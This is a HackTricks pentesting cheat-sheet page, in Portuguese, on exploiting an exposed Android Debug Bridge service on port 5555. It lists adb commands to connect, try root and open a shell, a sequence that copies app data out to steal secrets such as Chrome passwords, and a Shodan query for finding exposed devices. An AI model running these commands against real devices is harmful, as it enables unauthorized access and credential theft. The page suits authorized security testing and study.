hacktricks/network-services-pentesting/5555-android-debug-bridge.md

4.1 KiB

5555 - Android Debug Bridge

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Informações Básicas

A partir da documentação:

Android Debug Bridge (adb) é uma ferramenta versátil de linha de comando que permite comunicar com um dispositivo. O comando adb facilita uma variedade de ações no dispositivo, como instalar e depurar aplicativos, e fornece acesso a um shell Unix que você pode usar para executar uma variedade de comandos em um dispositivo.

Porta padrão: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Conectar

Se encontrar o serviço ADB em execução em uma porta de um dispositivo e conseguir se conectar a ele, você pode obter um shell dentro do sistema:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Para mais comandos ADB, consulte a seguinte página:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Dump de dados do aplicativo

Para baixar completamente os dados de um aplicativo, você pode:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Pode usar este truque para recuperar informações sensíveis como senhas do Chrome. Para mais informações sobre isso, verifique as informações e referências fornecidas aqui.

Shodan

  • android debug bridge
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks: